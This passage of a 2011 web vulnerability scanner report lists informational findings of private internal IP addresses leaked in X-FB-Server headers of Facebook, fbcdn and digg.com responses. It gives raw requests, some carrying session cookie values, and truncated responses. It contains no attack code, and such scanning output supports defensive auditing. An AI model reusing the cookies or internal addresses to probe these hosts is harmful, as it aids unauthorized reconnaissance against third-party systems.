HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.136.116
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 19903

.PNG
.
...IHDR.......t........ ....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

24.5. http://developers.facebook.com/images/devsite/icn_facebook_apps.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/images/devsite/icn_facebook_apps.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.74.130

Request

GET /images/devsite/icn_facebook_apps.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.74.130
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 4685

.PNG
.
...IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

24.6. http://developers.facebook.com/images/devsite/icn_mobile.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/images/devsite/icn_mobile.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.167.120

Request

GET /images/devsite/icn_mobile.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.167.120
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 2718

.PNG
.
...IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

24.7. http://developers.facebook.com/images/devsite/icn_open_source.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/images/devsite/icn_open_source.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.125.128

Request

GET /images/devsite/icn_open_source.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.125.128
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 2695

.PNG
.
...IHDR...0...0.....W.....
NIDATx^..Y.]e...{.g.a..^Kik[....A1A..........&> ..1.|....1..1.......d.. ..."J....C{.3.y....@Z.@o...o..O.....o..7,.(
...w!.&.&.&.&.=w..,...H......T*.=.2(..<..@.u....
...[SNIP]...

24.8. http://digg.com/ajax/tooltip/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/tooltip/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.145

Request

Response

24.9. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.128.186

Request

Response

24.10. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.181.31

Request

GET /safe_image.php?d=AQApTgvn10Rk0hhr&w=130&h=130&url=https%3A%2F%2Fi4.ytimg.com%2Fvi%2FCvYX_P_c__8%2Fdefault.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.181.31
X-Cnection: close
Content-Length: 3442
Vary: Accept-Encoding
Cache-Control: public, max-age=21600
Expires: Tue, 19 Jul 2011 20:57:46 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

24.11. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.108.95

Request

GET /safe_image.php?d=AQAiBTkQh96enSbv&w=130&h=130&url=http%3A%2F%2Fi4.ytimg.com%2Fvi%2Fcqd_4KSbnJo%2Fdefault.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.108.95
X-Cnection: close
Content-Length: 3141
Vary: Accept-Encoding
Cache-Control: public, max-age=21600
Expires: Tue, 19 Jul 2011 20:57:51 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

24.12. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.66.69

Request

GET /safe_image.php?d=AQBJSNWN0U24D9RS&w=130&h=130&url=http%3A%2F%2Fthumbnails.huluim.com%2F712%2F40011712%2F40011712_145x80_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.43.66.69
X-Cnection: close
Content-Length: 1659
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 20 Jul 2011 14:57:46 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

24.13. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.143.85

Request

GET /safe_image.php?d=AQA33UvSafIyB1_O&w=90&h=90&url=http%3A%2F%2Fgraphics8.nytimes.com%2Fimages%2F2011%2F07%2F10%2Fworld%2FMIDEAST%2FMIDEAST-thumbStandard.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.143.85
X-Cnection: close
Content-Length: 2818
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 20 Jul 2011 14:57:51 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

24.14. http://platform.ak.fbcdn.net/www/app_full_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.19.64

Request

GET /www/app_full_proxy.php?app=183319479511&v=1&size=z&cksum=326351c01bad7311632bf7ad8d8277ab&src=http%3A%2F%2Fzapp1.staticworld.net%2Fshared%2Fgraphics%2Fcms%2FyouTubeVideo_180.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.63.19.64
X-Cnection: close
Content-Length: 5428
Cache-Control: public, max-age=31535980
Expires: Wed, 18 Jul 2012 16:03:29 GMT
Date: Tue, 19 Jul 2011 16:03:49 GMT
Connection: close

......JFIF.....d.d......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

24.15. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.14.124

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/account/signin-widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "534d4ebec83c871a01ecbe77b511fc6e"
X-FB-Server: 10.27.14.124
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=857
Expires: Tue, 19 Jul 2011 14:42:53 GMT
Date: Tue, 19 Jul 2011 14:28:36 GMT
Connection: close

/*1310990211,169545340,JIT Construction: v406758,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

24.16. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff535ced%26origin%3Dhttp%253A%252F%252Fwww.bing.com%252Ff312b68508%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.bing.com%2Fcommunity%2Fsite_blogs%2Fb%2Ftravel%2Farchive%2F2011%2F07%2F19%2Fputting-the-fun-in-funiculars.aspx&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=225
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=309
Expires: Tue, 19 Jul 2011 23:45:26 GMT
Date: Tue, 19 Jul 2011 23:40:17 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

24.17. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=243
Expires: Tue, 19 Jul 2011 18:41:24 GMT
Date: Tue, 19 Jul 2011 18:37:21 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

24.18. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.138.69.186
Vary: Accept-Encoding
Content-Length: 781
Cache-Control: public, max-age=30807763
Expires: Tue, 10 Jul 2012 04:41:26 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1310359293,176833978*/

.sp_1hgi74{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/kp3yZbj02BI.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_fb3b
...[SNIP]...

24.19. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y-/r/H9wnMF3Lri6.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/y-/r/H9wnMF3Lri6.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:16 GMT
X-FB-Server: 10.138.64.184
Content-Length: 8302
Vary: Accept-Encoding
Cache-Control: public, max-age=27434679
Expires: Fri, 01 Jun 2012 03:42:25 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1306986080,176832696*/

#badge_subheader{padding:0 10px 5px 10px}
#badge_subheader h2{color:#3b5998;display:inline;font-size: 11px}
#badges{padding:5px 10px}
.status{margin:5px;padding:10px;width:au
...[SNIP]...

24.20. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y-/r/HHkUms5lcpx.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/y-/r/HHkUms5lcpx.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:24:31 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 2431
Vary: Accept-Encoding
Cache-Control: public, max-age=30423491
Expires: Thu, 05 Jul 2012 17:56:53 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1309975012,169775813*/

.fbGlossaryTip{position:relative}
.fbGlossaryTip:hover{text-decoration:none}
.fbGlossaryTip sup{padding-left:1px;font-weight:bold}
.fbGlossaryTipFixedWidth .tipTitle,.fbGloss
...[SNIP]...

24.21. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y0/r/vTlzK_6DGwe.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/y0/r/vTlzK_6DGwe.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:52:12 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 3707
Vary: Accept-Encoding
Cache-Control: public, max-age=30813011
Expires: Tue, 10 Jul 2012 06:08:56 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1310364576,169776318*/

.invite_history .footer_sector{padding-bottom:20px}
.invite_history .header{padding:20px 20px 0;margin:0}
.invite_history .header h2{background-image:url(http://static.ak.fbc
...[SNIP]...

24.22. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/y1/r/Mb-ySEi3O0b.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 21:15:31 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 6286
Vary: Accept-Encoding
Cache-Control: public, max-age=31215284
Expires: Sat, 14 Jul 2012 21:53:27 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1310766837,169776065*/

.og .fbChatTabMax{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/fWNizIMkOmm.png);background-repeat:no-repeat;background-position:0 0;display:inline-block;h
...[SNIP]...

24.23. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y1/r/r0jm6f8JtY2.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/y1/r/r0jm6f8JtY2.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 23 May 2011 17:45:40 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 10170
Vary: Accept-Encoding
Cache-Control: public, max-age=26656152
Expires: Wed, 23 May 2012 03:27:53 GMT
Date: Tue, 19 Jul 2011 14:58:41 GMT
Connection: close

/*1306207642,169775813*/

.interaction_form .recipients{font-size: 11px;padding:5px 10px 2px;color:#808080}
.interaction_form .recipients strong{float:left;padding:4px}
.interaction_form .recipients .
...[SNIP]...

24.24. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y1/r/rrdmptIcoxd.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/y1/r/rrdmptIcoxd.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:50:45 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 5955
Vary: Accept-Encoding
Cache-Control: public, max-age=30810636
Expires: Tue, 10 Jul 2012 05:28:30 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1310362104,169775812*/

.sp_59znm7{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_4efb
...[SNIP]...

